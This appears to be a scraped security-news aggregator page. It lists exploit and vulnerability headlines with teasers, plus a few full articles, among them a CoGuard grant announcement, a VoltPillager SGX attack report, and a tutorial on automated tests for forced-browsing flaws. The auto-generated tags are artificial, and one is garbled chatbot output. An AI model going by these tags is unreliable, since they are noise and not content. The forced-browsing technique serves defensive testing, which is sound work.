Summary

Top Articles:

  • A Western Digital Vulnerability is Being Actively Exploited to Wipe Connected Devices
  • 56874 Calls Using a Wardialer on the Finnish Telephone Network
  • Phone screenshots accidentally leaked online by stalkerware-type company
  • Using VBA Macros (from a Word Document) to Exploit Vulnerable Drivers
  • What are computer cookies?
  • All Roads Lead to OpenVPN: Pwning Industrial Remote Access Client
  • Enhancing Automated Configuration Security Capabilities with OpenAI Grant Funding
  • RISC-V Memory Hot Plugging To Be Introduced With Linux 6.11
  • The Next Standard Or The Pursuit Of Phantom Glory
  • New WiFi Authentication Vulnerabilities For Linux's IWD & WPA_Supplicant

Enhancing Automated Configuration Security Capabilities with OpenAI Grant Funding

Published: 2024-07-05 17:02:17

Popularity: None

Author: Written byCoGuardShare post

🤖: "secured config"

Introduction

In an era where software systems are increasingly complex and interconnected, the risks associated with misconfigurations have never been more significant. CoGuard, with the support of OpenAI's Cybersecurity Grant, is pioneering advancements in software configuration security. These developments ensure that our security solution evolves as rapidly as the technologies it aims to protect. 

Automating Security to Mitigate Configuration Risks 

The research funded by the OpenAI Cybersecurity Grant has allowed us to expand and enhance our rules set significantly. The automated creation of configuration security rules not only minimizes human error—a major cause of security breaches—but also ensures that configurations are precise and optimized for security and compliance. This automated approach addresses potential vulnerabilities in the configuration of software applications that have lacked specific security scanning rules, thereby maintaining a pro-active defense against evolving threats while supporting the adoption of new technologies by development teams.

Key Advancements in Automation

The grant has enabled an extraction pipeline, automating the derivation of security-relevant configuration parameters and rules from available software documentation and manuals. This ensures a comprehensive analysis and adherence to the latest security standards, significantly reducing human error and effort in rule maintenance.

Expanding and Streamlining Our Security Rule Set 

“By leveraging OpenAI’s capabilities, we’ve automated configuration rules extraction," noted Albert Heinle, CTO of CoGuard. "This extension has broadened our scanning capabilities to include previously complex software in terms of different configuration parameters or niche software projects."

The automatic expansion of the configuration rules engine enables CoGuard to scale its protection capabilities alongside client growth and the adoption of emerging technologies without compromising security or performance. This initiative not only enhances security but also boosts operational efficiency by freeing up IT resources for strategic initiatives rather than manual rule management tasks.

Learn More about the Research

For a deeper dive into our research and the specific findings of our latest project, we invite you to read our detailed research report available on GitHub: CoGuard's OpenAI Cybersecurity Grant funded research.

Looking to the Future

 As organizations continue to adopt additional software technologies, the need for adaptable and extensible configuration security measures grows. Our ongoing work with OpenAI to extend and refine our rulesets is just the beginning. We are committed to continuous improvement to ensure our customers' infrastructures remain secure and compliant in an ever-changing technological landscape.

Product Roadmap for Custom Configuration Rules

At CoGuard, we are committed to enhancing our configuration security capabilities to support a wide range of software applications. Our roadmap for the next quarter focuses on expanding our service to include custom configuration rules for the following key software platforms:

As we progress with our roadmap, we invite our customers, stakeholders and those interested in securing software infrastructure to engage with us in the development process. Feedback and insights from actual deployment scenarios are invaluable and help us refine our rules to better meet real-world demands. 

Get Started with CoGuard

Self-Service Scan 

Begin securing your environment immediately by installing our command-line tool. Use the following commands to install CoGuard-cli and start a read-only scan of your AWS/GCP/Azure configurations:

```
pip install coguard-cli
coguard scan aws
```

Assisted Setup 

Prefer a guided setup? Contact us, and our team will work with you to establish the necessary access permissions and discuss the findings from your configuration scan in detail. This personalized approach ensures that you fully understand the applications running on your cloud infrastructure.

Schedule a call with us to explore how CoGuard can help identify vulnerabilities and misconfigurations in your deployed applications.

...more

RISC-V Memory Hot Plugging To Be Introduced With Linux 6.11

Published: 2024-07-01 03:07:24

Popularity: None

Author: Written by

🤖: "Plug in"

The RISC-V kernel port with Linux 6.11 is introducing the ability to handle memory hot plugging/unplugging.

...more

The Next Standard Or The Pursuit Of Phantom Glory

Published: 2024-03-11 12:45:23

Popularity: None

Author: By Paul Nixer

SSH, as Secure Shell Protocol, is the cryptographic network protocol designed to connect machines in a secure manner. Since its introduction in 1995, the protocol has survived many years with many improvements, and in the last decade or more is the industry standard. Yes, here some Windows users will probably

...more

New WiFi Authentication Vulnerabilities For Linux's IWD & WPA_Supplicant

Published: 2024-02-14 03:39:38

Popularity: None

Author: Written by

Kicking off what may end up being a fairly busy Patch Tuesday are two WiFi authentication vulnerabilities being made public that affect Intel's IWD daemon as well as the WPA_Supplicant software -- between the two they are the most common solutions for wireless daemons on Linux systems.

...more

New WiFi Authentication Vulnerabilities For Linux's IWD & WPA_Supplicant

Published: 2024-02-13 18:57:30

Popularity: None

Author: Written by

Kicking off what may end up being a fairly busy Patch Tuesday are two WiFi authentication vulnerabilities being made public that affect Intel's IWD daemon as well as the WPA_Supplicant software -- between the two they are the most common solutions for wireless daemons on Linux systems.

...more

NVIDIA's Open-Source Kernel Driver & Maturing Wayland Support Were Great In 2023

Published: 2024-01-02 21:36:00

Popularity: None

Author: Written by

Following the 2023 highlights for Intel and AMD on Linux, here's a look back at the most popular Linux-related NVIDIA news for the past calendar year.

...more

X.Org Server & XWayland Updated Due To Two Decade-Old Security Vulnerabilities

Published: 2023-12-14 17:22:15

Popularity: None

Author: Written by

The X.Org Server doesn't see much in the way of feature work these days with Red Hat and others divesting from classic X.Org/X11 sessions

...more

Google introduces the almighty blue checkmark in Gmail, and it’s already being exploited

Published: 2023-06-05 11:26:14

Popularity: None

Author: by Robby Payne

Last month, Google introduced a Twitter-style blue checkmark for verified brands in Gmail. This means that anyone with the “Brand Indicators for Message Identification (BIMI) in Gmail” would have the trust of their users who would then know that the sender was, in fact, the real deal instead of an imposter. The almighty blue checkmark...

...more

Using VBA Macros (from a Word Document) to Exploit Vulnerable Drivers

Published: 2022-10-26 14:18:14

Popularity: 39

Author: hoistbypetard@users.lobste.rs (hoistbypetard)

Keywords:

  • security
  • programming
  • Comments

    ...more

    Lennart Poettering Talks Up A "Brave New Trusted Boot World" For Linux

    Published: 2022-10-26 01:29:57

    Popularity: None

    Author: Written by

    🤖: "secure boots"

    Systemd lead developer Lennart Poettering has written a lengthy blog post entitled a 'brave new trusted boot world' in which he outlines current issues with the Linux boot process and how there is a trajectory for providing the Linux boot experience with more robustness, simplicity, and trust.

    ...more

    Linux 6.1 Hardening Retpolines With Ensuring An INT3 After Every Unconditional Jump

    Published: 2022-10-06 23:00:57

    Popularity: None

    Author: Written by

    🤖: "`INT3 alert!`"

    The x86/core changes for Linux 6.1 have been merged and are headlined by making sure an INT3 instruction is inserted after every unconditional Retpoline jump (JMP) for the Retpolines handling on both Intel and AMD processors.

    ...more

    All Roads Lead to OpenVPN: Pwning Industrial Remote Access Client

    Published: 2021-11-19 15:51:15

    Popularity: 3

    Author: /u/n0llbyte

    Keywords:

  • r/netsec
  • What are computer cookies?

    Published: 2021-09-16 16:08:54

    Popularity: 35

    Author: Malwarebytes Labs

    Keywords:

  • Malwarebytes news
  • computer cookies
  • cookies
  • persistent cookies
  • session cookies
  • super cookies
  • third-party cookies
  • What are cookies, are they good or bad, how do they work, and why are some browsers banning third-party cookies? Categories: Malwarebytes news Tags: computer cookiescookiespersistent cookiessession cookiessuper cookiesthird-party cookies (Read more...) The post What are computer cookies? appeared first on Malwarebytes Labs.

    ...more

    Phone screenshots accidentally leaked online by stalkerware-type company

    Published: 2021-09-28 12:47:55

    Popularity: 53

    Author: Malwarebytes Labs

    Keywords:

  • Stalkerware
  • Bryan Fleming
  • Jo Coscia
  • Lukas Stefanko
  • pcTattleTale
  • stalkerware
  • unsecure bucket
  • Stalkerware-type company pcTattleTale hasn't been very careful about securing the screenshots it sneakily takes from its victims' phones. Categories: Stalkerware Tags: Bryan FlemingJo CosciaLukas StefankopcTattleTalestalkerwareunsecure bucket (Read more...) The post Phone screenshots accidentally leaked online by stalkerware-type company appeared first on Malwarebytes Labs.

    ...more

    56874 Calls Using a Wardialer on the Finnish Telephone Network

    Published: 2021-06-25 14:12:49

    Popularity: 105

    Author: hoistbypetard@users.lobste.rs (hoistbypetard)

    Keywords:

  • security
  • historical
  • 🤖: "wardialing spree"

    Comments

    ...more

    A Western Digital Vulnerability is Being Actively Exploited to Wipe Connected Devices

    Published: 2021-06-25 14:40:53

    Popularity: 7946

    Author: hoistbypetard@users.lobste.rs (hoistbypetard)

    Keywords:

  • security
  • Comments

    ...more

    VoltPillager: Researchers Compromise Intel SGX With Hardware-Based Undervolting Attack - Phoronix

    Published: 2021-02-07 03:38:35

    Popularity: None

    Author: Written by

    🤖: ""Security breach""

    Security researchers out of the University of Birmingham have crafted another attack against Intel Software Guard Extensions (SGX) when having physical motherboard access and using their "VoltPillager" hardware device they assembled for about $30 USD.

    Two years ago

    Plundervolt

    was widely publicized for compromising Intel's SGX security by manipulating the CPU frequency/voltage as able to through software interfaces. By carefully undervolting the Intel CPUs when executing enclave computations they were able to ultimately compromise the integrity of SGX.


    Pre-pandemic FOSDEM... Continually one of the best Linux/FLOSS events over the years.

    The impact of Plundervolt was already limited as typically the software needs root/administrative rights to access the CPU voltage/frequency MSRs or other kernel interfaces for manipulating them. But in response to Plundervolt, motherboard vendors began offering options to allow disabling voltage/frequency interface controls on their systems. Following Plundervolt, security researchers at the University of Birmingham in the UK began exploring a hardware-based attack on SGX.

    With the assembled "Voltpillager" device and latching onto the motherboard's VR responsible for the CPU voltage, they were able to mount fault-injection attacks to again break the integrity of SGX. With this ~$30 device they were able to run proof-of-concept attacks against crypto algorithms within SGX. Yes, this is a sophisticated attack and not as easy as say plugging in a compromised USB/Thunderbolt device with the Voltpillager needing to be carefully attached to the proper voltage regulator, but researchers have found this method to be successful even with Plundervolt safeguards enabled.

    This VoltPillager device is based on a Teensy microcontroller. The researchers behind this effort are formally presenting their research at the Usenix Security 2021 conference in August, but this weekend at the virtual FOSDEM conference their findings were shared as well. Their pre-publication paper on VoltPillager was published last November and can be found via

    Usenix.org

    but at the time didn't receive much attention.

    As for this weekend's FOSDEM Online event, see

    this slide deck

    (PDF) for those interested in VoltPillager for their hardware-based under-volting attack on Intel SGX.

    If it's not clear enough already, VoltPillager requires obvious hardware access to the system's motherboard and to carefully attach it to the proper VR for a particular motherboard -- so even while Plundervolt's scope was limited in needing root/admin access to the local system, VoltPillager is much more limited. Per the FOSDEM presentation, Intel responded to the researchers that tampering with the internal hardware to compromise SGX is "out of scope for SGX threat model" and prior Plundervolt mitigations were not designed for hardware-based attacks.

    More of the VoltPillager research can be found on

    GitHub

    .

    ...more

    Enter the Vault: Authentication Issues in HashiCorp Vault

    Published: 2020-10-06 18:06:28

    Popularity: None

    Author: Posted by

      Posted by Felix Wilhelm, Project Zero Introduction In this blog post I'll discuss two vulnerabilities in HashiCorp Vault and its integrati...

    ...more

    'Cursed' wallpaper image reportedly crashes Samsung, Google, other phones

    Published: 2020-06-02 03:55:55

    Popularity: None

    Author: Shelby Brown

    🤖: ""Phone crash""

    Using a specific wallpaper image causes some phones to soft-brick.

    ...more

    Linus Torvalds Switches To AMD Ryzen Threadripper After 15 Years Of Intel Systems - Phoronix

    Published: 2020-05-25 04:27:54

    Popularity: None

    Author: Written by

    🤖: "CPU switcheroo"

    An interesting anecdote shared in today's

    Linux 5.7-rc7 announcement

    is word that Linux and Git creator Linus Torvalds switched his main rig over to an AMD Ryzen Threadripper.

    At least for what he has said in the past, Linus has long been using Intel boxes given his close relationship with the company (and even close proximity to many of the Intel Portland open-source crew). In fact, he commented this is the first time in about fifteen years not using an Intel system as his primary machine. He made this interesting remark in the RC7 announcement:

    In fact, the biggest excitement this week for me was just that I upgraded my main machine, and for the first time in about 15 years, my desktop isn't Intel-based. No, I didn't switch to ARM yet, but I'm now rocking an AMD Threadripper 3970x. My 'allmodconfig' test builds are now three times faster than they used to be, which doesn't matter so much right now during the calming down period, but I will most definitely notice the upgrade during the next merge window.

    The

    Threadripper 3970X

    and the rest of the 3900 series line-up are incredibly great options for kernel developers and those frequently compiling large code-bases. He didn't mention the CPU in his prior Intel box, but he is seeing 3x faster builds.

    With the upcoming

    Linux 5.8

    merge window in early June, his Threadripper system is sure to have a great workout.

    This in turn is actually good news as well for AMD Ryzen Linux users: as Torvalds is constantly building the latest kernel code for mainline, he tends to shout quite publicly and loudly when any code breaks on his systems stemming from botched/poorly-tested pull requests... Thus with the extra and immediate exposure on Threadripper, he will hopefully be spotting any kernel-breaking regressions more quickly and who knows whatever other improvements he may be able to wrangle up as he's burning in his new system.

    ...more

    Microsoft Patch Tuesday — March 2020: Vulnerability disclosures and Snort coverage

    Published: 2020-03-10 20:25:04

    Popularity: None

    Author: Posted by

    🤖: "Patching up"

    A blog from the world class Intelligence Group, Talos, Cisco's Intelligence Group

    ...more

    Goodbye, Flash

    Published: 2019-10-30 14:30:34

    Popularity: None

    Author: Posted by Dong-Hwi Lee, engineering manager, Google

    🤖: "End of an era"

    Official news on crawling and indexing sites for the Google index

    ...more

    A very deep dive into iOS Exploit chains found in the wild

    Published: 2019-08-30 04:20:46

    Popularity: None

    Author: Posted by

    🤖: "iOS Crash"

    Posted by Ian Beer, Project Zero Project Zero’s mission is to make 0-day hard. We often work with other companies to find and report se...

    ...more

    Show HN: Kvmapp – A New Lightweight VM Manager for Linux

    Published: 2019-06-11 10:38:10

    Popularity: None

    Author: tobbyb

    🤖: ""Virtual chaos""

    Article URL: https://www.flockport.com/guides/simplifying-linux-vms Comments URL: https://news.ycombinator.com/item?id=20154264 Points: 1 # Comments: 0

    ...more

    Advisory: Security Issue with Bluetooth Low Energy (BLE) Titan Security Keys

    Published: 2019-05-15 17:57:21

    Popularity: None

    Author: Posted by Christiaan Brand, Product Manager, Google Cloud

    Posted by Christiaan Brand, Product Manager, Google Cloud We’ve become aware of an issue that affects the Bluetooth Low Energy (BLE) vers...

    ...more

    Programmers solve MIT’s 20-year-old cryptographic puzzle | MIT CSAIL

    Published: 2019-05-01 13:29:20

    Popularity: None

    Author: Written By

    🤖: "cryptcracked"

    This week MIT’s Computer Science and Artificial Intelligence Laboratory (CSAIL) announced that a 20-year-old cryptographic puzzle was just solved by a self-taught programmer from Belgium, 15 years earlier than MIT scientists expected.

    Bernard Fabrot spent the last three and a half years computing the solution to a puzzle first announced by MIT researchers in 1999. Separately, another team led by tech executive Simon Peffers is nearing completion of computing a solution.

    The puzzle essentially involves doing roughly 80 trillion successive squarings of a starting number, and was specifically designed to foil anyone trying to solve it more quickly by using parallel computing.

    Fabrot and Peffers took very different approaches to the puzzle. Fabrot used a simple Intel Core i7-6700 found in consumer PCs, and computed the solution using the GNU Multiple Precision Arithmetic Library (GMP). Meanwhile, Peffers' team used a novel squaring algorithm (designed by Erdinç Öztürk from Sabanci University) to run on a programmable hardware accelerator called an FPGA. The team, which is working as part of a collaboration called Cryptophage, is on track to finish the puzzle on May 11 after only two months of computation.

    “There have been hardware and software advances beyond what I predicted in 1999,” says MIT professor Ron Rivest, who first announced the puzzle in April 1999 tied to a celebration of 35 years of research at MIT’s Laboratory for Computer Science (now CSAIL). “The puzzle’s fundamental challenge of doing roughly 80 trillion squarings remains unbroken, but the resources required to do a single squaring have been reduced by much more than I predicted.”

    The puzzle is an example of a “verifiable delay function” (VDF), meaning that its answer can only be solved after a certain number of steps. Because VDFs can also be used to create unbiased randomness, they’ve been proposed as potential approaches to improve the security and scalability of blockchain systems like Ethereum and Filecoin. 

    In the original announcement, LCS promised that, if a correct solution was uncovered, they would open a special “time capsule” designed by architect Frank Gehry and filled with historical artifacts from the likes of Web inventor Tim Berners-Lee, Ethernet co-inventor Bob Metcalfe, and Microsoft founder Bill Gates. (Gates donated the original Altair BASIC that represented Microsoft’s first-ever product, which they developed for MITS in 1975.)

    The capsule ceremony will happen Wednesday, May 15 at 4 p.m. at MIT’s Stata Center.

    ...more

    v1.6.04

    Published: 2019-03-08 00:53:52

    Popularity: None

    Author: Posted by

    🤖: "Version fail"

    This release fixes a number of minor bugs in the JavaScript code analysis engine. These bugs resulted in false negatives or performance prob...

    ...more

    Public release of the OWASP TESTING GUIDE v4

    Published: 2019-03-08 00:53:13

    Popularity: None

    Author: Posted by

    17th September, 2014: OWASP is announcing the new OWASP Testing Guide v4.     The OWASP Testing Guide includes a "best practice" ...

    ...more

    The poisoned NUL byte, 2014 edition

    Published: 2019-03-08 00:53:00

    Popularity: None

    Author: Posted by

    🤖: "null pointer"

    Posted by Chris Evans, Exploit Writer Underling to Tavis Ormandy Back in this 1998 post to the Bugtraq mailing list , Olaf Kirch outline...

    ...more

    Rogue Android Apps Hosting Web Site Exposes Malicious Infrastructure

    Published: 2019-03-08 00:49:45

    Popularity: None

    Author: Posted by

    🤖: ""Bad App Alert""

    With cybercriminals continuing to populate the cybercrime ecosystem with automatically generated and monetized mobile malware variants, w...

    ...more

    How I created two images with the same MD5 hash

    Published: 2019-03-08 00:49:11

    Popularity: None

    Author: Posted by

    🤖: "Hash collision"

    I posted the following images the other day which although looking totally different have exactly the same MD5 hash ( e06723d4961a0a3f950e...

    ...more

    Android Malware Analysis Distros

    Published: 2019-03-08 00:46:02

    Popularity: None

    Author: Posted by

    🤖: "malware alert"

    A bit of everything around Android Malware & Security. Always sanitizing malware with some fresh "lemon" juice.

    ...more

    Inside SimpLocker

    Published: 2019-03-08 00:45:56

    Popularity: None

    Author: Posted by

    🤖: "malware alert"

    A bit of everything around Android Malware & Security. Always sanitizing malware with some fresh "lemon" juice.

    ...more

    Building a deeper understanding of images

    Published: 2019-03-08 00:44:01

    Popularity: None

    Author: Posted by Christian Szegedy, Software Engineer

    🤖: "Image insight"

    Posted by Christian Szegedy, Software Engineer The ImageNet large-scale visual recognition challenge ( ILSVRC ) is the largest academic chal...

    ...more

    An introduction to gikdbg.art (aka Android Ollydbg) attaching Towelroot

    Published: 2019-03-08 00:40:54

    Popularity: None

    Author: Posted by

    🤖: "I'm not going to make it easy for you. Here's a response: Towel root failure"

    A bit of everything around Android Malware & Security. Always sanitizing malware with some fresh "lemon" juice.

    ...more

    Dex to Java decompiler (jadx)

    Published: 2019-03-08 00:40:52

    Popularity: None

    Author: Posted by

    🤖: "Reverse engineering"

    A bit of everything around Android Malware & Security. Always sanitizing malware with some fresh "lemon" juice.

    ...more

    trusted bootloader RCE trickery

    Published: 2019-03-08 00:35:28

    Popularity: None

    Author: Posted by

    🤖: ""Booty call fails""

    So you are safe, because you updated your bash, run your policy in enforcing  mode, enabled NX and ASLR and boot using a cryptographically...

    ...more

    (DNA Top 10 in 2014) Censorship 2.0: Shadowy forces controlling online conversations

    Published: 2019-03-08 00:29:29

    Popularity: None

    Author: By A. Asohan April 30, 2015

    🤖: "CENSORED"

    At the HITBSecConf event in Kuala Lumpur last month, a team from South Africa demonstrated how unknown forces are manipulating hearts and minds on the Internet by controlling the online narrative, writes A. Asohan.

    ...more

    Chinese Counterintelligence Doesn't Fool Around

    Published: 2019-03-08 00:28:20

    Popularity: None

    Author: Posted by

    🤖: "Spies getting taken down"

    Screen capture from 2 Jan 2015 SCMP This is an amazing story in the South China Morning Post . Typist sentenced to death in China for ...

    ...more

    DIA Cyber Warrior delivers first Worldwide Threat Assessment

    Published: 2019-03-08 00:26:23

    Popularity: None

    Author: Posted by

    🤖: "Cyber warning siren"

    A blog about computer crime, digital evidence, and the cases and criminals related to those crimes. Malware, botnets, spam, and phishing.

    ...more

    Android is ready for work

    Published: 2019-03-08 00:25:17

    Popularity: None

    Author: Posted by Rajen Sheth, Director of Product Management, Android and Chrome for Work

    🤖: "Mobile office party"

    Posted by Rajen Sheth, Director of Product Management, Android and Chrome for Work (Cross-posted on the Android Blog .) Over a billi...

    ...more

    Exploiting the DRAM rowhammer bug to gain kernel privileges

    Published: 2019-03-08 00:24:33

    Popularity: None

    Author: Posted by

    🤖: "Rowhammer chaos"

    Rowhammer blog post (draft) Posted by Mark Seaborn, sandbox builder and breaker, with contributions by Thomas Dullien, reverse en...

    ...more

    Tracking Protection for Firefox at Web 2.0 Security and Privacy 2015

    Published: 2019-03-08 00:20:40

    Popularity: None

    Author: Posted by

    🤖: "Trackers blocked"

    Edited to add: I wrote a followup post to address comments here and elsewhere that advertising is working as intended. This paper has been ...

    ...more

    The Blue Team Myth

    Published: 2019-03-08 00:17:11

    Popularity: None

    Author: Posted by

    🤖: "Cyber battle prep"

    The 2015 M-Trends Report  states that the median number of days that threat groups were present in a victim's network before detection was 2...

    ...more

    How we cracked millions of Ashley Madison bcrypt hashes efficiently

    Published: 2019-03-08 00:12:51

    Popularity: None

    Author: Posted by

    🤖: "Cracked and burned"

    Not long after the release of the Ashley Madison leaks, many groups and individuals attempted to crack the bcrypt hashes. Since t...

    ...more

    Improved Digital Certificate Security

    Published: 2019-03-08 00:10:31

    Popularity: None

    Author: Posted by Stephan Somogyi, Security & Privacy PM, and Adam Eijdenberg, Certificate Transparency PM

    🤖: "Locked and loaded!"

    Posted by Stephan Somogyi, Security & Privacy PM, and Adam Eijdenberg, Certificate Transparency PM On September 14, around 19:20 GMT, Syma...

    ...more

    Windows Drivers are True’ly Tricky

    Published: 2019-03-08 00:08:49

    Popularity: None

    Author: Posted by

    🤖: "Windows crash"

    Posted by James Forshaw, Driving for Bugs Auditing a product for security vulnerabilities can be a difficult challenge, and there’s no ...

    ...more

    Hack The Galaxy: Hunting Bugs in the Samsung Galaxy S6 Edge

    Published: 2019-03-08 00:06:49

    Popularity: None

    Author: Posted by

    🤖: "space bugs"

    Posted by Natalie Silvanovich, Planner of Bug Bashes Recently, Project Zero researched a popular Android phone, the Samsung Galaxy S6 E...

    ...more

    ARRIS Cable Modem has a Backdoor in the Backdoor

    Published: 2019-03-08 00:05:57

    Popularity: None

    Author: Posted by

    🤖: "Backdoor activated"

    A couple of months ago, some friends invited me to give a talk at NullByte Security Conference . I started to study about some embedded devi...

    ...more

    Between a Rock and a Hard Link

    Published: 2019-03-08 00:04:03

    Popularity: None

    Author: Posted by

    🤖: "Linking problems"

    Posted by James Forshaw, File System Enthusiast In a previous blog post I described some of the changes that Microsoft has made to the ...

    ...more

    Speak About Your Cyberwar at PHDays VI

    Published: 2019-03-08 00:02:38

    Popularity: None

    Author: Posted by

    🤖: ""cyber warfare""

    Positive Hack Days VI, the international forum on practical information security, opens Call for Papers on December 3, 2015. Our internati...

    ...more

    Breaking and evading Linux with a new novel technique |SentinelOne.com

    Published: 2019-03-08 00:02:31

    Popularity: None

    Author: By SentinelOne Labs -

    🤖: ""Evade me!""

    The focus of any malware research is on anticipating where an attack may go, or where it’s already been in order to develop and implement new prevention techniques.

    ...more

    FireEye Exploitation: Project Zero’s Vulnerability of the Beast

    Published: 2019-03-08 00:02:24

    Popularity: None

    Author: Posted by

    Posted by Tavis Ormandy, Chief Silver Bullet Skeptic. FireEye sell security appliances to enterprise and government customers. FireEye...

    ...more

    Effective Fully Automated Forced Browsing Testing

    Published: 2019-03-08 00:02:04

    Popularity: None

    Author: written by

    Forced browsing is the class of serious web application vulnerability I see the most often. Contrary to conventional wisdom, you can build effective automated tests for it in your application, tests that don’t use hard-coding or fuzzing.

    This friend of mine, Ohran, maintains a decent-sized web app, mydeathstar.empire. It does various boring administrative things for this space station, and the guy in charge, Darth something, keeps him busy with lots of little tweaks. The latest one was that for some reason he wanted to restrict who was allowed to remotely operate the trash compactors. Apparently there’d been some issue with that. So my friend wrote some code for the web app’s navigation header so that you’d only see a link to the trash compactor dashboard if you had the right set of privileges. It looked something like

    in render_nav_bar:

    if(current_user.trash_master) {  link_to("/trash_compactor_dashboard")  } 

    So Trash Masters saw a page like this:

    While regular stormtroopers saw a page without the link:

    Now, Ohran is very conscientious about quality (apparently Darth Whatever isn’t very forgiving of bugs) so he added in a couple of automated tests too:

    login_as(regular_user) visit_page("/") assert_not_in_page("/trash_compactor_dashboard") 
    login_as(trashy_user) visit_page("/") assert_in_page("/trash_compactor_dashboard") 

    And of course he deployed it to a staging server and had someone click around to make sure everything looked right. Eventually, he pushed the changes to the live server, and all seemed well.

    That night, though, he woke up in a sudden panic. He pulled his laptop onto his chest and logged in to his account. The link wasn’t there, as expected – trash wasn’t his job. Then, he manually typed a URL into his address bar, hit enter, and…

    Ohran had forgotten some very important code. When a request came in to load the dashboard page, or perform any trash compactor action, he needed to check to ensure that request was actually authorized. Even though no unauthorized user could get to the dashboard by accident, anybody with an account could use the forced browsing technique to load the page–and since it had previously been accessible to everyone, people certainly knew the URL. Ohran had to scramble to fix his mistake before anyone noticed.

    After saving his neck, Ohran came to me, still fretting. “The authorization logic in this app is all over the place,” he said. “I don’t have the time or the freedom to refactor it, so whenever I add a new authorization rule, I just have to remember to add it in at least two places: hiding the link, and controlling the actual functionality. If I forget the first one, the user sees an error, and if I forget the second one, I’ve made the app vulnerable. For all I know, there’s some other forced browsing vulnerability out there that I’ve missed. Like when stormtrooper TK-422 goes to his personal preferences page, the URL looks like /users/TK-422/preferences. If he changed the number in the URL so it was /users/TK-421/preferences, he shouldn’t see TK-421’s preference page, that’s private!” Ohran rubbed his throat.

    “Can’t you write a test for forced browsing?” I asked.

    “I Googled it, and apparently you can’t really,” said Ohran. “Like, OWASP says ‘Automated tools are unlikely to find these problems.’ They give a lot of ways to defend against it, but they’re all manual testing and refactoring and doing code analysis. Which, I mean, I’ll do as much as I can. Everywhere else I’ve looked says it’s impossible, aside from just checking a hardcoded list of common ‘sensitive paths’ like /admin.php. There’s no way /trash_compactor_dashboard is gonna be on that list. Or there’s fuzzing, but same deal there–no testing tool is going to randomly guess that URL.”

    Ohran and I put our heads together, and eventually we figured out a solution. It was actually pretty obvious in retrospect: just take what a manual white-hat tester does when searching for forced browsing vulnerabilities, and do it programmatically. First, we wrote a helper function in Ohran’s test code that could crawl the site, recursively following all of the links that a given user could see and returning the complete list. It looked something like

    define browse_as(user) { visited_pages = Set.new() crawl(user, "/",visited_pages) return(visited_pages) } define crawl(user, page, visited_pages) { login_as(user) visit_page(page) visited_pages.add(page) current_page.links.for_each(link) {   if(!visited_pages.include(link)) {crawl(user,link, visited_pages)} } } 

    Just your standard spider. We made it re-login on every request just because some links log you out, but we could also have blacklisted logout links and other links that leave the site, so that we don’t end up crawling around the actual web.

    Then we checked in a test. In the test, we create two users. One has all the privileges in the app: she could operate the trash compactors, commence primary ignition, open the thermal exhaust port, whatever. The other just has the minimum privileges necessary to log in. Then, the test crawls as both users, and compares the results. Crawling as the privileged user is just a simple way of enumerating all the pages in the app. Crawling as the unprivileged user is a way of inferring what the user is expected to be able to see. We can assume that if a user sees a link to a page they’re not supposed to see, that’ll be caught in manual testing. So this automated test now knows that any user can see the home page, their preference page, and a station-wide list of alerts, say. Now we take the difference of the lists: the list of all pages the privileged user can browse to, but the unprivileged user can’t. This will include admin-only pages, like the trash compactor dashboard, as well as personal pages for the privileged user, like her preferences page. Finally, we can loop over each link in this list, and try forced browsing to it as the unprivileged user. If we get a success response, not a redirect or an error, then this is likely a forced browsing vulnerability, and the test should fail. The test looks like:

    privileged_user_visible_pages = browse_as(privileged_user) regular_user_visible_pages = browse_as(unprivileged_user) restricted_pages = privileged_user_visible_pages.except(regular_user_visible_pages) restricted_pages.for_each(link) { login_as(unprivileged_user) visit_page(link) assert_error_page(current_page) } 

    Happily, it turns out the conventional wisdom is wrong. As long as you have the ability to log in as both a privileged and unprivileged user, you can write an automated test for your web app that catches forced browsing vulnerabilities. I believe this should be added to integration testing for most web applications. If you use an interactive testing tool like Burp Suite, I’d suggest implementing this as a plugin (I might even write this as a bookmarklet one of these days). If you use, say, Cucumber, it’s probably fastest to just implement this algorithm by hand in your existing test suite.

    Gotchas:

    • Make sure you secure your write (e.g. POST, PUT) routes, not just your page reads. My pseudo-code above works for this if “current_page.links” includes form submissions and AJAX requests, and “visit_page()” can handle form submissions, but that’s tricky since you may need mock data.
    • As mentioned, it’s best to restrict the links you follow to relative links and ones to the same domain, and to blacklist the logout link.
    • For a large enough app, this can be a time-consuming test. Ideally, try to run it outside of a browser to save time rendering. You may also want to optimize by adding “redundant” pages to your blacklist, such as pages after the first of a paginated result list.
    • Make sure you’re running against a test database that has at least one of everything, so that every possible link exists.
    • If you try to browse to a page you don’t have access to, some apps will simply serve a page you do have access to instead, without returning a 3xx Redirect response or displaying an error. These can lead to spurious failures in your tests. Ideally you should change that behavior, as it’s not very standards-compliant anyway.
    • A purely single-page web app that doesn’t store state in the URL at all will have to do this a bit differently, possibly by recording the AJAX requests done as each user crawls, then forcing those rather than front-end state.
    • The test as described doesn’t catch similar vulnerabilities involving other kinds of user-controllable input, such as cookies and hidden form submissions. It might be worth expanding to record everything (besides the authentication secret) the privileged user sends, and replaying it as the unprivileged user.
    • It may be non-trivial to ensure your privileged user always has all possible privileges.

    And one final, meta-level disclaimer: try not to write projects with authorization rules that keep you up at night, scattered around different files and enforced in different ways. Try to put all of them in one place, so you can reference them both when deciding what links to render and what actions to allow. Make it impossible to process a request if no authorization check has run. And then test anyway.

    ...more

    Vulnerability in Blackphone Allows Complete Takeover | SentinelOne.com

    Published: 2019-03-08 00:00:20

    Popularity: None

    Author: By SentinelOne Labs -

    The Blackphone is generally considered the most secure smartphone available today, We recently discovered a vulnerability that could allow an attacker to remotely control the phone’s modem functions.

    ...more

    Raising the Dead

    Published: 2019-03-08 00:00:12

    Popularity: None

    Author: Posted by

    Posted by James Forshaw, your Friendly Neighbourhood Necromancer. It’s a bit late for Halloween but the ability to resurrect the dead (p...

    ...more

    [manager.paypal.com] Remote Code Execution Vulnerability

    Published: 2019-03-07 23:59:10

    Popularity: None

    Author: Posted by

    In December 2015, I found a critical vulnerability in one of PayPal business websites ( manager.paypal.com ). It allowed me to exe...

    ...more

    The Rising Sophistication of Network Scanning

    Published: 2019-03-07 23:58:59

    Popularity: None

    Author: Posted by

    Gone are the days when computers didn't need firewalls. We are now living in an internet security arms race and your personal information ...

    ...more

    Putting the spotlight on firmware malware

    Published: 2019-03-07 23:58:48

    Popularity: None

    Author: Published by

    Firmware malware has been a hot topic ever since Snowden's leaks revealed NSA's efforts to infect BIOS firmware. However, BIOS malware is no...

    ...more

    BinDiff now available for free

    Published: 2019-03-07 23:56:35

    Popularity: None

    Author: Posted by Christian Blichmann, Software Engineer

